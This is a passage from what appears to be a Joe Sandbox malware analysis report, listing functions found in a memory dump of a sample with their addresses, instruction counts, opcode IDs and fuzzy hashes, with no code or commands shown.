                                                  • Opcode ID: 1486a2025c03be765355a071716541e4627c713626c929beb0c21e0b43f251ee
                                                  • Instruction ID: 248af82705e4e218ced67d75160a53de3327a76b2e10b7cca4e071567d57021b
                                                  • Opcode Fuzzy Hash: 1486a2025c03be765355a071716541e4627c713626c929beb0c21e0b43f251ee
                                                  • Instruction Fuzzy Hash: 9EF06D30A19E1E5FDAB9D77480A4672B2E1FF58300F164578D06EC2594DE38E9468740
                                                  Function 00007FFD9B8780E6 Relevance: .0, Instructions: 43COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2386395153.00007FFD9B870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B870000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ffd9b870000_zamPeEkHWr.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 0327244ffa04948505aa0398d8c243815c949ad698a742fde007c51e7cdc7d20
                                                  • Instruction ID: bfe3df50b06a9373445b49efdc3e3b0d2b432c23eddfeb43f565738cd26c48eb
                                                  • Opcode Fuzzy Hash: 0327244ffa04948505aa0398d8c243815c949ad698a742fde007c51e7cdc7d20
                                                  • Instruction Fuzzy Hash: 6D010C32B2545D4EDB58E7A8C8A5AFDB3B0FF58204F4100B5D00EA31F3CE286A01D751
                                                  Function 00007FFD9B872AAC Relevance: .0, Instructions: 42COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2386395153.00007FFD9B870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B870000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ffd9b870000_zamPeEkHWr.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: a276bf97fd34012aa966b1e27706ee8a3d4b9810aaa9feed7925ba38d9ec5146
                                                  • Instruction ID: 5112123da20d95c62080c9ebbb8e3f05dcfe3686b02e32f0cdd13fb4998d1384
                                                  • Opcode Fuzzy Hash: a276bf97fd34012aa966b1e27706ee8a3d4b9810aaa9feed7925ba38d9ec5146
                                                  • Instruction Fuzzy Hash: 08F0C831B1CA8A4FD799EF6C8459935B3E1EFA9305B45417EA44AC72A1DF20DC418B42
                                                  Function 00007FFD9B8C2118 Relevance: .0, Instructions: 42COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2386395153.00007FFD9B870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B870000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ffd9b870000_zamPeEkHWr.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 958ab98f12f57d9fd958678996c2cf1d420bdcae9e549e0d22cb184dca9dc06e
                                                  • Instruction ID: 4d455f633171623676dbb9ca6b81e493e347f914c317af0a9fe30aabfd9cf608
                                                  • Opcode Fuzzy Hash: 958ab98f12f57d9fd958678996c2cf1d420bdcae9e549e0d22cb184dca9dc06e
                                                  • Instruction Fuzzy Hash: 1DF03CA071A90E8FDFA4FB6CC466D7473D0EB683447A645A9D40EC72A1E916E9868700
                                                  Function 00007FFD9B8815A0 Relevance: .0, Instructions: 42COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2386395153.00007FFD9B870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B870000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ffd9b870000_zamPeEkHWr.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: c8fbf779c9d8412135a65efdeb511c592043fa94c9444774463482ef0bdd610d
                                                  • Instruction ID: 65f119e0ed2f0f008f29bded334686d4f448d82bb050683cbc19bea5a8c62ca1
                                                  • Opcode Fuzzy Hash: c8fbf779c9d8412135a65efdeb511c592043fa94c9444774463482ef0bdd610d
                                                  • Instruction Fuzzy Hash: 30F06870E2CE094BE794FB78941557AB6D0FF8C355F040A7AE89DD21A9EE38D6804782
                                                  Function 00007FFD9B88A75D Relevance: .0, Instructions: 41COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2386395153.00007FFD9B870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B870000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ffd9b870000_zamPeEkHWr.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 2965a0cfece1a8c022dbddd001b5c6ad3559a7961de38850146a1fa81592feb9
                                                  • Instruction ID: 35c0519137d9399246cc03e9ccc2b9bb27b006e1a213fee6068260cab050e65e
                                                  • Opcode Fuzzy Hash: 2965a0cfece1a8c022dbddd001b5c6ad3559a7961de38850146a1fa81592feb9
                                                  • Instruction Fuzzy Hash: C5F0E501B1A81E57B36433EE389D1FE4389DFDC2357640173E05CC22D6DD5858475290
                                                  Function 00007FFD9B884971 Relevance: .0, Instructions: 40COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2386395153.00007FFD9B870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B870000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ffd9b870000_zamPeEkHWr.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 20ec9682f22be9059954b74fcba1b23c252d0497ef90ea4f781fa23869802f45
                                                  • Instruction ID: a53b71f122bd1e723a67011889705dbb1b31c3f10d325c74a09c0e78463238d2
                                                  • Opcode Fuzzy Hash: 20ec9682f22be9059954b74fcba1b23c252d0497ef90ea4f781fa23869802f45
                                                  • Instruction Fuzzy Hash: 5CF0F662B25E490FF398522C04A92B053C3DFE8791B55007A9458C72A6EC6A98028241
                                                  Function 00007FFD9B877F91 Relevance: .0, Instructions: 40COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2386395153.00007FFD9B870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B870000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ffd9b870000_zamPeEkHWr.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: b94ff7bf7c8e399ca565f642b162c399a20328cb96886d26b39d54590b758f05
                                                  • Instruction ID: 7e6f126bb2621f755559118aae218e002bce7a83f122c223dfaf257b8d766b36
                                                  • Opcode Fuzzy Hash: b94ff7bf7c8e399ca565f642b162c399a20328cb96886d26b39d54590b758f05
                                                  • Instruction Fuzzy Hash: 14014F32B2545D4EDB54EBA8C865BFDB7B1FF88204F410075D01DE31E3CE286A009751
                                                  Function 00007FFD9B87121A Relevance: .0, Instructions: 40COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2386395153.00007FFD9B870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B870000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ffd9b870000_zamPeEkHWr.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 1b0a9000fca980d2fea2a840c4b6f6aa0287f0b10c646cc0eeb2774fb3e8d7bb
                                                  • Instruction ID: a91f078ac598ed6050c9d83e452b5cc45774b2eabe6997b4959d9ea7c007c89e
                                                  • Opcode Fuzzy Hash: 1b0a9000fca980d2fea2a840c4b6f6aa0287f0b10c646cc0eeb2774fb3e8d7bb
                                                  • Instruction Fuzzy Hash: 7A01EC30A1860E8FDF94EF98C8909EBB3A1FF98304F114665E419C7599CA34E9519B80
                                                  Function 00007FFD9B886788 Relevance: .0, Instructions: 39COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2386395153.00007FFD9B870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B870000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ffd9b870000_zamPeEkHWr.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: bfa468bb24579001a690199780bd3f95a4be7fcbd5f94bbb169dec06d327222a
                                                  • Instruction ID: 8e13c3dc0576bcebeb35d527b11ccfe505d4102784422f4a1de7dcb858279f69
                                                  • Opcode Fuzzy Hash: bfa468bb24579001a690199780bd3f95a4be7fcbd5f94bbb169dec06d327222a
                                                  • Instruction Fuzzy Hash: BCF0C830A1CB094BE754FB688415579BAE0FF8C315F040B7EE89DD2165EE38D6804782
                                                  Function 00007FFD9B877AF5 Relevance: .0, Instructions: 38COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2386395153.00007FFD9B870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B870000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ffd9b870000_zamPeEkHWr.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 4755cdf0687db383e0958877493e4b6201108d4d98d95e35bba3a7c96bdff2b1
                                                  • Instruction ID: b1e1a527b1f2541a30ff7a3b5c42a279f8e2cf50b46b2983f8df73a5e7fd4eff
                                                  • Opcode Fuzzy Hash: 4755cdf0687db383e0958877493e4b6201108d4d98d95e35bba3a7c96bdff2b1
                                                  • Instruction Fuzzy Hash: 1AF06D66A0F7CD5EDB6397A848710C83FB0EE07618B4A01E7D5D4DB0F3D6186A09D362
                                                  Function 00007FFD9B87CDE7 Relevance: .0, Instructions: 37COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2386395153.00007FFD9B870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B870000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ffd9b870000_zamPeEkHWr.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 86b19293576b2019119b931698c6619cf267c66c17b13d62f7eb9b947bd16045
                                                  • Instruction ID: a6d05a0575cbb6c7be6aba25ac4733341d39539df77ac9910f0641c75a92f571
                                                  • Opcode Fuzzy Hash: 86b19293576b2019119b931698c6619cf267c66c17b13d62f7eb9b947bd16045
                                                  • Instruction Fuzzy Hash: 61F0BB357089094FDBD4EF18C498BA963E2EF58304F5544B4E41DC72AACA34E8518B01
                                                  Function 00007FFD9B889E00 Relevance: .0, Instructions: 36COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2386395153.00007FFD9B870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B870000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ffd9b870000_zamPeEkHWr.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 26c57ffc9c1b1e3890d65f36dab77c1d3d72b2ba6d25a61547708de2d3e25f68
                                                  • Instruction ID: 3c737a9ae3f7ae5b4696f6dcef7caf047203ec8d126087e1233f9f8db6c3011e
                                                  • Opcode Fuzzy Hash: 26c57ffc9c1b1e3890d65f36dab77c1d3d72b2ba6d25a61547708de2d3e25f68
                                                  • Instruction Fuzzy Hash: 85F0E9C1E1DE6A05F7B562FA34553BA29C1AB28310F4914B7D88DC69D1ED0CFEC58381
                                                  Function 00007FFD9B87905E Relevance: .0, Instructions: 36COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2386395153.00007FFD9B870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B870000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ffd9b870000_zamPeEkHWr.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 4a1fc1de3ea6eda80ac0dc3fbee3423caf16976368b8528687ac9d557759ac54
                                                  • Instruction ID: 106c613aeb933f4afcee76e38282ce0a8626d967a1de196949990bbe463f4202
                                                  • Opcode Fuzzy Hash: 4a1fc1de3ea6eda80ac0dc3fbee3423caf16976368b8528687ac9d557759ac54
                                                  • Instruction Fuzzy Hash: 55F02B41F1E94F1EFB5E636844B12B85943EF99244B4944F9D01EC31DBEE1869065201
                                                  Function 00007FFD9B879A93 Relevance: .0, Instructions: 35COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2386395153.00007FFD9B870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B870000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ffd9b870000_zamPeEkHWr.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: e1229e3da90200a6eb14cf77d1b4f050433938e94a4e54b70ce48d1ce9da194e
                                                  • Instruction ID: 150662442b55461659d8ac0daa937e69e61bb7768d2480ad2e4755fbc74644dc
                                                  • Opcode Fuzzy Hash: e1229e3da90200a6eb14cf77d1b4f050433938e94a4e54b70ce48d1ce9da194e
                                                  • Instruction Fuzzy Hash: D2F02412F1EA1F5AF7A9D74C50B43B162A3EFAD398F928436D00DC32D5ED64A8019341
                                                  Function 00007FFD9B877E3B Relevance: .0, Instructions: 31COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2386395153.00007FFD9B870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B870000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ffd9b870000_zamPeEkHWr.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 294faeaf5ee0088a818a8c9457ca429d28252dc02381a074311bb07cfea7bb21
                                                  • Instruction ID: 18a0640b03896fa30d947ee245cd407843b8e0dad1772e008b6fbe9d45c935fe
                                                  • Opcode Fuzzy Hash: 294faeaf5ee0088a818a8c9457ca429d28252dc02381a074311bb07cfea7bb21
                                                  • Instruction Fuzzy Hash: 11F05421B1944E4EE754F7A8D4A6BFEB7A0EF88308F8104B4D11ED31E7CD242905D781
                                                  Function 00007FFD9B871A80 Relevance: .0, Instructions: 30COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2386395153.00007FFD9B870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B870000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ffd9b870000_zamPeEkHWr.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: e1bed54bab559baf1317f21d7fb121df5176968ad7493a3b6296ff6b3a12a6ef
                                                  • Instruction ID: 42fefecf8287d8a0932e2509984f5a54a8f77c460ed85383f9d0b179aefd8cfe
                                                  • Opcode Fuzzy Hash: e1bed54bab559baf1317f21d7fb121df5176968ad7493a3b6296ff6b3a12a6ef
                                                  • Instruction Fuzzy Hash: E0E06871A09B4C4BDF60BB58A8605D8BBA0EF88358F040069E01CC3280D6215950C341
                                                  Function 00007FFD9B889AA4 Relevance: .0, Instructions: 29COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2386395153.00007FFD9B870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B870000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ffd9b870000_zamPeEkHWr.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 4f2e5ea52854e1752ee892aa30a2dc16d30dd8a39feca8de9db96bd1cec09302
                                                  • Instruction ID: 574a5e63539ef40b3e00959b29d2e197beffe5ba2e8236e1753df4bbc4bbd099
                                                  • Opcode Fuzzy Hash: 4f2e5ea52854e1752ee892aa30a2dc16d30dd8a39feca8de9db96bd1cec09302
                                                  • Instruction Fuzzy Hash: D8F027A1A1FE6E4FE3A9A75C14292B85182EB5D350F46167BA11DC3192EC2805804681
                                                  Function 00007FFD9B8B9198 Relevance: .0, Instructions: 28COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2386395153.00007FFD9B870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B870000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ffd9b870000_zamPeEkHWr.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 8116d37b3fab379acf86ded4c1fa289917d22b6dc5981168a66337c1d265dbe4
                                                  • Instruction ID: 8caf21a22609c01da94da62508e9488a8ece7a0a5be843e3bd0fcfad3cb9888f
                                                  • Opcode Fuzzy Hash: 8116d37b3fab379acf86ded4c1fa289917d22b6dc5981168a66337c1d265dbe4
                                                  • Instruction Fuzzy Hash: 69E04610F1AD3E06F9B427FC34296B422808F0C310B0601B2E80DC21A5EC0DBED60AC5
                                                  Function 00007FFD9B87F9D2 Relevance: .0, Instructions: 27COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2386395153.00007FFD9B870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B870000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ffd9b870000_zamPeEkHWr.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 9a284b7f1d7dcfbd3b25657b557396c6d00452ab6b30ae189ffb8df90d56f090
                                                  • Instruction ID: 17c43e089ef785a4d528bf1492d709d817fbcf638a1d6c7b4a7c6046795d601f
                                                  • Opcode Fuzzy Hash: 9a284b7f1d7dcfbd3b25657b557396c6d00452ab6b30ae189ffb8df90d56f090
                                                  • Instruction Fuzzy Hash: 09E08671260E8D9FCB85CF8C9C601E233D2FB5D311754452AE86AC73E0DB359852C780
                                                  Function 00007FFD9B872E71 Relevance: .0, Instructions: 27COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2386395153.00007FFD9B870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B870000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ffd9b870000_zamPeEkHWr.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 02af990f0ecc4f29c102482e7947a97db826181a8f9bb24c6de6b21b20a311bf
                                                  • Instruction ID: f315a1de84ac2fa3916d720e22d85634aaae9bb06aa0bd87c6484335474475ea
                                                  • Opcode Fuzzy Hash: 02af990f0ecc4f29c102482e7947a97db826181a8f9bb24c6de6b21b20a311bf
                                                  • Instruction Fuzzy Hash: C8E0D841F2DA4A0AF718B678087B1B861C3EFACB04F0644B9A809C32DFFC39684101C3
                                                  Function 00007FFD9B8B12C0 Relevance: .0, Instructions: 27COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2386395153.00007FFD9B870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B870000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ffd9b870000_zamPeEkHWr.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 7439b2cbf8940f5c7ef025c336077ea7168627215063589a554d045f97afc0c0
                                                  • Instruction ID: 31feb57661bd19685764cf61a8b922b156abf8af265ff7e178e5bafbd3087f12
                                                  • Opcode Fuzzy Hash: 7439b2cbf8940f5c7ef025c336077ea7168627215063589a554d045f97afc0c0
                                                  • Instruction Fuzzy Hash: F5E04F30716E1D5BD7B9E7B94459A3275D6FBAD2023110179900CC3662DD25D842C740
                                                  Function 00007FFD9B889A19 Relevance: .0, Instructions: 26COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2386395153.00007FFD9B870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B870000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ffd9b870000_zamPeEkHWr.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 56bbe9023bda558b078a32c70eaeb4429713fd493f7289c06c0173f233d25a78
                                                  • Instruction ID: d3976344ba919ec4b373c547227380a16592c959b6f0713231f22eedd3e84690
                                                  • Opcode Fuzzy Hash: 56bbe9023bda558b078a32c70eaeb4429713fd493f7289c06c0173f233d25a78
                                                  • Instruction Fuzzy Hash: E4F0EC7191E7CD4FD356AB7408291947F71EF16300F4606E7E054C6093DA5845848753
                                                  Function 00007FFD9B8866F9 Relevance: .0, Instructions: 26COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2386395153.00007FFD9B870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B870000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ffd9b870000_zamPeEkHWr.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: fb15e93126c002568a67055a6dadf8446b2df91303aea1cad28d06a9bef85220
                                                  • Instruction ID: 727b752bf17c6608436f3fb4d30e51f84342a9e508cbb395bc1ec48c974af58e
                                                  • Opcode Fuzzy Hash: fb15e93126c002568a67055a6dadf8446b2df91303aea1cad28d06a9bef85220
                                                  • Instruction Fuzzy Hash: 27E0E56190E7C50FD752AB2488614557FB09F49210F0E06F7C894CA1B3EA18D6858342
                                                  Function 00007FFD9B8709AD Relevance: .0, Instructions: 25COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2386395153.00007FFD9B870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B870000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ffd9b870000_zamPeEkHWr.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 56e461a22c05851006605708a3d101b1a851655374c9c76b4bfdb4652f393a36
                                                  • Instruction ID: c7f5978b36a08da2b13a432826b581dba244046b6bf09bebf5f4aea3e6ad3af6
                                                  • Opcode Fuzzy Hash: 56e461a22c05851006605708a3d101b1a851655374c9c76b4bfdb4652f393a36
                                                  • Instruction Fuzzy Hash: 11E0C222F5580E49EF08B3B47C7A9FDB285DF89208FD10875E01DC30CBDD1929120182
                                                  Function 00007FFD9B8808BA Relevance: .0, Instructions: 25COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2386395153.00007FFD9B870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B870000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ffd9b870000_zamPeEkHWr.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: f21fe2a2cd3f611a780968dfe05791b7f28b2acc830cf88c0e8057d0238ee73b
                                                  • Instruction ID: 68968ebf60ba1c1b0f0cde900a98124ade9c7a46054da1bdc09bacdf48bb91a1
                                                  • Opcode Fuzzy Hash: f21fe2a2cd3f611a780968dfe05791b7f28b2acc830cf88c0e8057d0238ee73b
                                                  • Instruction Fuzzy Hash: E5E02652B18D1A0FEBCCA71C54102A803D2FF98B50F4041A9E41CC32CACC20D8434380
                                                  Function 00007FFD9B8848C8 Relevance: .0, Instructions: 25COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2386395153.00007FFD9B870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B870000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ffd9b870000_zamPeEkHWr.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 76793d08e2dcad83b3ea887de2be0cf5b97587114a45d8466a536ba86e10db6d
                                                  • Instruction ID: 5e625b0fae18c03e538b57722a5b9c855ae34acfe8087ccfd001426637cdf76f
                                                  • Opcode Fuzzy Hash: 76793d08e2dcad83b3ea887de2be0cf5b97587114a45d8466a536ba86e10db6d
                                                  • Instruction Fuzzy Hash: B7D0EC73B0E91D5AE578A38474231FC7385DF49130B56103FD15F814A2A92A26121185
                                                  Function 00007FFD9B873FDD Relevance: .0, Instructions: 25COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2386395153.00007FFD9B870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B870000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ffd9b870000_zamPeEkHWr.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 84d94c80c657f7f0d55090beaade2e70d117f208f9f2a8e23c479fe12ee557bb
                                                  • Instruction ID: feeefaee8bbe2df05aa62540630af92a19b15cc432d9d56899f5355de678d755
                                                  • Opcode Fuzzy Hash: 84d94c80c657f7f0d55090beaade2e70d117f208f9f2a8e23c479fe12ee557bb
                                                  • Instruction Fuzzy Hash: 77E0C221F5580E89EB48B3B43C769FDB245DF89204FC10875E11DC30CBDD2925121182
                                                  Function 00007FFD9B87E03D Relevance: .0, Instructions: 25COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2386395153.00007FFD9B870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B870000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ffd9b870000_zamPeEkHWr.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: e06d89479bbfd7b7fb448ba942869745606e82e1667160f10ebd2642ecc11171
                                                  • Instruction ID: 95efe33f446ffd16d79a6301bcb8da76bd08181fae6f5737b138b3779cd1fb19
                                                  • Opcode Fuzzy Hash: e06d89479bbfd7b7fb448ba942869745606e82e1667160f10ebd2642ecc11171
                                                  • Instruction Fuzzy Hash: 5FE0C221F5580E4DEB08B3B43CB69FDB289EF8A204FC10871E02DC30CBDD2925120182
                                                  Function 00007FFD9B870CFD Relevance: .0, Instructions: 25COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2386395153.00007FFD9B870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B870000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ffd9b870000_zamPeEkHWr.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 3b25a67c554dc81463ab386ed34507f2384f8bd9b4151e66ddc7a6644249a2ca
                                                  • Instruction ID: 925b48c8ff8064878a2309c945d0f5d0f1b465668fcaf191ecc5d4ba578c07cc
                                                  • Opcode Fuzzy Hash: 3b25a67c554dc81463ab386ed34507f2384f8bd9b4151e66ddc7a6644249a2ca
                                                  • Instruction Fuzzy Hash: FCE0C221F6580E89EF48B3B47C76DFDF245DF89204BD10871E02DC30CBDD1925120582
                                                  Function 00007FFD9B888858 Relevance: .0, Instructions: 25COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2386395153.00007FFD9B870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B870000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ffd9b870000_zamPeEkHWr.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 76793d08e2dcad83b3ea887de2be0cf5b97587114a45d8466a536ba86e10db6d
                                                  • Instruction ID: 5a71e98cb2b1e61ff40ea14fc87f6c5b66df4f371f1304dde952e6602bcda2a1
                                                  • Opcode Fuzzy Hash: 76793d08e2dcad83b3ea887de2be0cf5b97587114a45d8466a536ba86e10db6d
                                                  • Instruction Fuzzy Hash: 8DD0E222B9F90E4AE5B8638874231FC7382DB89330B92103BD16E814E6992B22131186
                                                  Function 00007FFD9B87F87D Relevance: .0, Instructions: 23COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2386395153.00007FFD9B870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B870000, based on PE: false
                                                  Joe Sandbox IDA Plugin
